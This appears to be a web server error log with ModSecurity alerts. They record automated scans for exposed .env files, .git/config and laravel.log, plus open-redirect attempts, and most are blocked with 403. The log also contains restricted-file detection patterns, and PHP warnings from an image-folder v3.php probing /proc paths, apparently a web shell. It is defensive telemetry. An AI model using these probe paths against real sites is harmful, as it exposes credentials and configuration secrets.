[Mon May 11 14:59:01.497688 2026] [security2:error] [pid 1319885:tid 1319918] [client 5.255.107.253:37344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.backup"] [unique_id "agHSlVchVQ3tCn0m9OpStgAAARA"]
[Mon May 11 14:59:01.497918 2026] [security2:error] [pid 1319998:tid 1320002] [client 5.255.107.253:37400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agHSlat2WtvoFr7xvGzOtgAAAII"]
[Mon May 11 14:59:01.497924 2026] [security2:error] [pid 1319885:tid 1319918] [client 5.255.107.253:37344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.backup"] [unique_id "agHSlVchVQ3tCn0m9OpStgAAARA"]
[Mon May 11 14:59:01.498195 2026] [security2:error] [pid 1319998:tid 1320002] [client 5.255.107.253:37400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agHSlat2WtvoFr7xvGzOtgAAAII"]
[Mon May 11 14:59:01.498214 2026] [security2:error] [pid 1319885:tid 1319918] [client 5.255.107.253:37344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.backup"] [unique_id "agHSlVchVQ3tCn0m9OpStgAAARA"]
[Mon May 11 14:59:01.498061 2026] [security2:error] [pid 1320398:tid 1320410] [client 5.255.107.253:37334] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.development"] [unique_id "agHSleJEyNRN152ArOSExAAAAEo"]
[Mon May 11 14:59:01.498397 2026] [security2:error] [pid 1320398:tid 1320410] [client 5.255.107.253:37334] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.development"] [unique_id "agHSleJEyNRN152ArOSExAAAAEo"]
[Mon May 11 14:59:01.499114 2026] [security2:error] [pid 1320398:tid 1320410] [client 5.255.107.253:37334] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.development"] [unique_id "agHSleJEyNRN152ArOSExAAAAEo"]
[Mon May 11 14:59:01.499530 2026] [security2:error] [pid 1320674:tid 1320704] [client 5.255.107.253:37266] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.production"] [unique_id "agHSlaO9RdIr1DwxYR2MwgAAAM8"]
[Mon May 11 14:59:01.499831 2026] [security2:error] [pid 1319953:tid 1319956] [client 5.255.107.253:37242] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "domaine-de-janasse.com"] [uri "/storage/logs/laravel.log"] [unique_id "agHSleSQ-m-m0ukSSht8AwAAAUE"]
[Mon May 11 14:59:01.499912 2026] [security2:error] [pid 1320674:tid 1320704] [client 5.255.107.253:37266] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.production"] [unique_id "agHSlaO9RdIr1DwxYR2MwgAAAM8"]
[Mon May 11 14:59:01.500174 2026] [security2:error] [pid 1319953:tid 1319956] [client 5.255.107.253:37242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/storage/logs/laravel.log"] [unique_id "agHSleSQ-m-m0ukSSht8AwAAAUE"]
[Mon May 11 14:59:01.500778 2026] [security2:error] [pid 1320674:tid 1320704] [client 5.255.107.253:37266] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.production"] [unique_id "agHSlaO9RdIr1DwxYR2MwgAAAM8"]
[Mon May 11 14:59:01.501392 2026] [security2:error] [pid 1319953:tid 1319956] [client 5.255.107.253:37242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/storage/logs/laravel.log"] [unique_id "agHSleSQ-m-m0ukSSht8AwAAAUE"]
[Mon May 11 14:59:01.503995 2026] [security2:error] [pid 1319998:tid 1320024] [client 5.255.107.253:37374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/api/.env"] [unique_id "agHSlat2WtvoFr7xvGzOtwAAAJg"]
[Mon May 11 14:59:01.504170 2026] [security2:error] [pid 1319998:tid 1320024] [client 5.255.107.253:37374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/api/.env"] [unique_id "agHSlat2WtvoFr7xvGzOtwAAAJg"]
[Mon May 11 14:59:01.504176 2026] [:error] [pid 1319953:tid 1319955] [client 5.255.107.253:37416] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:01.504274 2026] [:error] [pid 1319885:tid 1319930] [client 5.255.107.253:37410] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:01.505046 2026] [security2:error] [pid 1319886:tid 1319902] [client 5.255.107.253:37406] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/public/.env"] [unique_id "agHSlay-5-wpj6Sx56aS7AAAAAM"]
[Mon May 11 14:59:01.505218 2026] [security2:error] [pid 1319886:tid 1319902] [client 5.255.107.253:37406] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/public/.env"] [unique_id "agHSlay-5-wpj6Sx56aS7AAAAAM"]
[Mon May 11 14:59:01.505408 2026] [security2:error] [pid 1319998:tid 1320024] [client 5.255.107.253:37374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/api/.env"] [unique_id "agHSlat2WtvoFr7xvGzOtwAAAJg"]
[Mon May 11 14:59:01.505731 2026] [:error] [pid 1320398:tid 1320417] [client 5.255.107.253:37370] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:01.521934 2026] [security2:error] [pid 1319886:tid 1319902] [client 5.255.107.253:37406] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/public/.env"] [unique_id "agHSlay-5-wpj6Sx56aS7AAAAAM"]
[Mon May 11 14:59:02.093738 2026] [:error] [pid 1319886:tid 1319902] [client 5.255.107.253:37406] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.157825 2026] [:error] [pid 1319885:tid 1319930] [client 5.255.107.253:37410] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.158336 2026] [:error] [pid 1319885:tid 1319918] [client 5.255.107.253:37344] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.158211 2026] [:error] [pid 1319886:tid 1319908] [client 5.255.107.253:37354] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.158588 2026] [:error] [pid 1319886:tid 1319928] [client 5.255.107.253:37446] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.158714 2026] [:error] [pid 1320398:tid 1320408] [client 5.255.107.253:37364] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.158923 2026] [:error] [pid 1319953:tid 1319964] [client 5.255.107.253:37290] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159036 2026] [:error] [pid 1320674:tid 1320695] [client 5.255.107.253:37418] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159053 2026] [:error] [pid 1319885:tid 1319915] [client 5.255.107.253:37264] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159311 2026] [:error] [pid 1320398:tid 1320402] [client 5.255.107.253:37440] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159314 2026] [:error] [pid 1319885:tid 1319927] [client 5.255.107.253:37426] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159315 2026] [:error] [pid 1320398:tid 1320410] [client 5.255.107.253:37334] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159425 2026] [:error] [pid 1319998:tid 1320018] [client 5.255.107.253:37424] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159499 2026] [:error] [pid 1319998:tid 1320002] [client 5.255.107.253:37400] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159767 2026] [:error] [pid 1320674:tid 1320711] [client 5.255.107.253:37254] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159939 2026] [:error] [pid 1320674:tid 1320704] [client 5.255.107.253:37266] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.159946 2026] [:error] [pid 1319885:tid 1319900] [client 5.255.107.253:37302] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.160040 2026] [:error] [pid 1320398:tid 1320417] [client 5.255.107.253:37370] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.160057 2026] [:error] [pid 1319998:tid 1320007] [client 5.255.107.253:37278] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.160131 2026] [:error] [pid 1319885:tid 1319903] [client 5.255.107.253:37390] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.160511 2026] [:error] [pid 1319886:tid 1319917] [client 5.255.107.253:37346] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.160545 2026] [:error] [pid 1320674:tid 1320697] [client 5.255.107.253:37422] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.160321 2026] [:error] [pid 1319998:tid 1320024] [client 5.255.107.253:37374] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.160661 2026] [:error] [pid 1319953:tid 1319956] [client 5.255.107.253:37242] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.161109 2026] [:error] [pid 1319953:tid 1319969] [client 5.255.107.253:37382] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:02.164135 2026] [:error] [pid 1319953:tid 1319955] [client 5.255.107.253:37416] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:03.644281 2026] [:error] [pid 1320398:tid 1320414] [client 66.249.75.165:48649] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:03.685949 2026] [authz_core:error] [pid 1319885:tid 1319912] [client 52.23.112.144:15354] AH01630: client denied by server configuration: /home/missmand/public_html/projet/error_log
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704263/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704263/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704263/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704263/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704263/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704263/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 15:00:02.910182 2026] [security2:error] [pid 1319998:tid 1320022] [client 43.156.228.27:56006] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "missmandarine.com"] [uri "/"] [unique_id "agHS0qt2WtvoFr7xvGzPBAAAAJY"], referer: http://missmandarine.com
[Mon May 11 15:00:16.251216 2026] [security2:error] [pid 1320398:tid 1320420] [client 43.153.104.196:53996] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "217.113.192.26"] [uri "/"] [unique_id "agHS4OJEyNRN152ArOSFHwAAAFQ"]
[Mon May 11 15:00:59.466076 2026] [security2:error] [pid 1320674:tid 1320705] [client 34.32.165.10:34266] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHTC6O9RdIr1DwxYR2NVAAAANA"]
[Mon May 11 15:00:59.466414 2026] [security2:error] [pid 1320674:tid 1320705] [client 34.32.165.10:34266] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHTC6O9RdIr1DwxYR2NVAAAANA"]
[Mon May 11 15:00:59.466926 2026] [security2:error] [pid 1320674:tid 1320705] [client 34.32.165.10:34266] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHTC6O9RdIr1DwxYR2NVAAAANA"]
[Mon May 11 15:01:13.740464 2026] [security2:error] [pid 1319886:tid 1319905] [client 15.235.145.59:62647] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/bonusdexoqio.com"] [unique_id "agHTGay-5-wpj6Sx56aTiQAAAAQ"]
[Mon May 11 15:01:13.740951 2026] [security2:error] [pid 1319886:tid 1319905] [client 15.235.145.59:62647] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/bonusdexoqio.com"] [unique_id "agHTGay-5-wpj6Sx56aTiQAAAAQ"]
[Mon May 11 15:01:13.741211 2026] [security2:error] [pid 1319886:tid 1319905] [client 15.235.145.59:62647] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/bonusdexoqio.com"] [unique_id "agHTGay-5-wpj6Sx56aTiQAAAAQ"]
[Mon May 11 15:01:19.479568 2026] [security2:error] [pid 1319953:tid 1319979] [client 15.235.145.59:62889] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/bonusdexoqio.com"] [unique_id "agHTH-SQ-m-m0ukSSht8ogAAAVg"], referer: https://www.piregwan-genesis.com
[Mon May 11 15:01:19.480043 2026] [security2:error] [pid 1319953:tid 1319979] [client 15.235.145.59:62889] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/bonusdexoqio.com"] [unique_id "agHTH-SQ-m-m0ukSSht8ogAAAVg"], referer: https://www.piregwan-genesis.com
